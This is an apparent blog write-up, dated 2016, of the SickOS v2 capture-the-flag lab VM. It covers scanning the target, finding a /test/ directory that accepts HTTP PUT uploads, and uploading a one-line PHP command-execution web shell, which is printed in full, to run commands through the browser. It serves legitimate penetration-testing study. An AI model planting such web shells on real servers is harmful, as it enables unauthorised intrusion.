Wednesday 1 June 2016

SickOS v2 challnege

Hi,
Looking for our target




















OK, out target has assigned 192.168.1.102 IP address.

Scanning














Good, I prefer begin pentesting form web application.
































The above picture is a default page. Source code contain only information that this picture is named blow.jpg. I have run dirbuster and








The /test/ directory is empty, and index.php contains the blow.jpg picture. I haven't found exploits to lighttp and OpenSSH. Hmmm, /test/ directory looks interesting but at first glance it is nothing special. In the meantime I downloaded the blow.jpg picture and I was looking for some sensitive informtion hardcodened into pic - without success.
I have tried PUT some script like a phpinfo and SUCCESS!!!









click on test.php and

















Great! We have got following result because our test.php
<?php phpinfo(); ?>
It is our opportunity to upload reverse shell
I have uploaded out reverse shell script and named as shell1.php
<?php echo exec($_GET['cmd']); ?>
and let's try execute id command on shell








Excellent! We have got limited shell via web browser. It's not comfortable for me. I am going to try achieve limited shell in some other way.

TBU